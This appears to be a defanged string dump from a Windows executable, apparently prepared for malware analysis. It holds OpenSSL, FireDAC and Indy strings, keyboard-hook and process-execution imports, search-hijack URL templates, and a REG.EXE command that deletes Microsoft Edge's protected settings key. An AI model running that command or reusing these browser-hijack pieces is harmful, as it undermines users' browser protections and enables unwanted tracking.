d2i_TS_MSG_IMPRINT_bio
d2i_TS_MSG_IMPRINT_fp
d2i_X509_CERT_AUX
d2i_X509_CERT_PAIR
d2i_X509_PKEY
d2i_X509_PUBKEY
i2b_PrivateKey_bio
i2b_PublicKey_bio
i2d_AUTHORITY_KEYID
i2d_CERTIFICATEPOLICIES
i2d_DSAPrivateKey_bio
i2d_DSAPrivateKey_fp
i2d_DSAPublicKey
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY_bio
i2d_DSA_PUBKEY_fp
i2d_ECPrivateKey
i2d_ECPrivateKey_bio
i2d_ECPrivateKey_fp
i2d_EC_PUBKEY
i2d_EC_PUBKEY_bio
i2d_EC_PUBKEY_fp
i2d_ESS_CERT_ID
i2d_ESS_SIGNING_CERT
i2d_EXTENDED_KEY_USAGE
i2d_KRB5_ENCKEY
i2d_OCSP_CERTID
i2d_OCSP_CERTSTATUS
i2d_PKCS8PrivateKeyInfo_bio
i2d_PKCS8PrivateKeyInfo_fp
i2d_PKCS8PrivateKey_bio
i2d_PKCS8PrivateKey_fp
i2d_PKCS8PrivateKey_nid_bio
i2d_PKCS8PrivateKey_nid_fp
i2d_PKCS8_PRIV_KEY_INFO
i2d_PKCS8_PRIV_KEY_INFO_bio
i2d_PKCS8_PRIV_KEY_INFO_fp
i2d_PKEY_USAGE_PERIOD
i2d_PROXY_CERT_INFO_EXTENSION
i2d_PUBKEY
i2d_PUBKEY_bio
i2d_PUBKEY_fp
i2d_PrivateKey_fp
i2d_RSAPrivateKey_bio
i2d_RSAPrivateKey_fp
i2d_RSAPublicKey_bio
i2d_RSAPublicKey_fp
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY_bio
i2d_RSA_PUBKEY_fp
i2d_TS_MSG_IMPRINT
i2d_TS_MSG_IMPRINT_bio
i2d_TS_MSG_IMPRINT_fp
i2d_X509_CERT_AUX
i2d_X509_CERT_PAIR
i2d_X509_PKEY
i2d_X509_PUBKEY
i2o_ECPublicKey
o2i_ECPublicKey
private_AES_set_decrypt_key
private_AES_set_encrypt_key
private_RC4_set_key
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://VVV.vmware.com/0
O"%U.
<V.TZ
"`#.hr
MP0.jc
%DP`H
v%%DH
~.xp`I
.VQWd
\.WWWW9
tCPTFlRPu
?%D|W
\.DHLP.
\.hlpt.
is %d?)`
'%s:%d: reX
ng)msg_hdr|
.too smh7
?gKey-Arg
_KEY_BLOC
.UDICQ
@.MNl1
SSLEAY32.dll
SSL_CTX_get_cert_store
SSL_CTX_get_client_cert_cb
SSL_CTX_set_cert_store
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_engine
SSL_CTX_set_msg_callback
SSL_CTX_set_srp_password
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate_ASN1
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_check_private_key
SSL_export_keying_material
SSL_get_certificate
SSL_get_peer_cert_chain
SSL_get_privatekey
SSL_set_msg_callback
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
WinExec
SetProcessShutdownParameters
SetNamedPipeHandleState
GetWindowsDirectoryA
GetConsoleOutputCP
GetCPInfo
RegOpenKeyExA
RegCloseKey
RegSaveKeyA
RegRestoreKeyA
RegQueryInfoKeyW
RegQueryInfoKeyA
RegOpenKeyExW
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
SetViewportOrgEx
ShellExecuteW
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
EnumChildWindows
CreateDialogIndirectParamW
CreateDialogIndirectParamA
ActivateKeyboardLayout
GetKeyboardType
.idata
.rdata
P.reloc
P.rsrc
*.ALS
R'y.OE&
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
advapi32.dll
d3d9.dll
gdi32.dll
mpr.dll
opengl32.dll
shell32.dll
user32.dll
version.dll
*<>#%"{}|\^[]`
hXXps://
/ot.php?imsid=
sDELETE "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" /f
REG.EXE
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
{searchTerms}&text2=%s&suggest=1&type=6
{searchTerms}&text2=%s&instant=1&type=6
{searchTerms}&text2=%s&search=1&type=6
hXXp://google.com
888816666554443
6666554443
!6666554443
No matching DOM Vendor: "%s"<Selected DOM Vendor does not support this property or method;Property or Method "%s" is not supported by DOM Vendor "%s"
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
HSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
Unnamed)"%s" DOMImplementation already registered
5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)
#Cannot read RAW data of [%s] object
Class [%s] is not registered
Unknown storage format [%s]"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged on
=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
Cannot read [%s] property
Cannot read [%s] object
&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
record has been changed/deleted by another user<Operation cannot be performed without assigned SelectCommand
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state
&Column [%s] data type is not supported
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %s
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported
Set TADConnection.DriverName or add DriverID to your connection definition
Capability is not supported
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
Meta information mismatchvCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %s
>Operation cannot mix aggregate value with record-varying value
%s&Bookmark is not found for dataset [%s]
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s]
uColumn or function [%s] is not found.
Invalid use of keyword
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
Expected [%s].Arithmetic in filter expressions not supported
&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data type
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set
%s is not a valid BCD value
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid SQL date/time values
FireDAC Login#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset!Cannot modify a read-only dataset#Nested dataset must inherit from %s
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
SQL not supported: %s
Execute not supported: %s1Operation not allowed on a unidirectional dataset
0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
Field '%s' must have a value
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' cannot be modified
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
No help keyword specified.
Invalid FieldKind Field '%s' is of an unknown type
Duplicate field name '%s'
Field '%s' not found#Cannot access field '%s' as type %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Win32 error: %s (%u)%s%s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
Windows 8.1
Windows Server 2012 R2
(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
"%s" does not match RootKey
bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Invalid stream operation
5The certificate is not valid for the requested usage.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.
9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY
'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.
;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
Failed to load %s.
SSL status: "%s"
%s Alert
%s Read Alert
%s Write Alert
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Invalid destination index (%d)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid property type: %s
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to create key %s
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property element: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
I/O error %d
The OpenSSL Project, hXXp://VVV.openssl.org/
1.0.1g
ClassGUID={4d36e96c-e325-11ce-bfc1-08002be10318}
LayoutFile=layout.inf
DriverVer=07/01/2001,5.1.2535.0
Include=ks.inf
Needs=KS.Registration
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation
RegisterDlls=BDA.RegisterDlls
CopyFiles=BdaPlugIn.Files, BdaFilter.Files, BdaDriver.Files
[DefaultInstall.NT]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation.NT
BdaFilter.Files=11
BdaPlugIn.Files=11
AllDll.Files=11
BdaDriver.Files=10,system32\drivers
AllDriver.Files=10,system32\drivers
[BDA.Registration]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration
[BDA.Installation]
[BDA.Installation.NT]
[BDA.CategoryRegistration]
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,FriendlyName,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,CLSID,,%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,FriendlyName,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,CLSID,,%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,Merit,1,00,00,60,00
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,FriendlyName,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,CLSID,,"%GUID.BdaRenderer%"
[BDA.NodeRegistration]
; HKLM,%MediaCategories%\%GUID.Bridge%,Name,,%Node.Bridge%
; HKLM,%MediaCategories%\%GUID.Bridge%,Display,1,00,00,00,00
[BDA.PinNameRegistration]
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Name,,%Pin.Name.AtscTS%
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Name,,%Pin.Name.IPV4%
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Name,,%Pin.Name.MPE%
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Name,,%Pin.Name.NABTS%
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Display,1,00,00,00,00
[BDA.DeviceInstallation]
HKLM,%RunOnce%,"MPE0",,"rundll32.exe streamci,StreamingDeviceSetup %MPE.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\mpe.inf,BDAcodec"
HKLM,%RunOnce%,"STREAMIP0",,"rundll32.exe streamci,StreamingDeviceSetup %StreamIP.DeviceId%,GLOBAL,%GUID.BdaRenderer%,%\streamip.inf,BDAcodec"
HKLM,%RunOnce%,"SLIP0",,"rundll32.exe streamci,StreamingDeviceSetup %Slip.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\slip.inf,VBIcodec"
HKLM,%RunOnce%,"CCDECODE0",,"rundll32.exe streamci,StreamingDeviceSetup ÌDecode.DeviceId%,GLOBAL,%VBIcatID%,%\CCDECODE.inf,CCDECODE.Interface.Install"
HKLM,%RunOnce%,"NABTSFEC0",,"rundll32.exe streamci,StreamingDeviceSetup %NabtsFEC.DeviceID%,GLOBAL,%VBIcatID%,%\NABTSFEC.inf,NABTSFEC.Interface.Install"
HKLM,%RunOnce%,"WSTCODEC0",,"rundll32.exe streamci,StreamingDeviceSetup %WSTCodec.DeviceId%,GLOBAL,%VBIcatID%,%\WSTCODEC.inf,WSTCODEC.Interface.Install"
[NdisIP.Installation]
[NdisIP.Installation.NT]
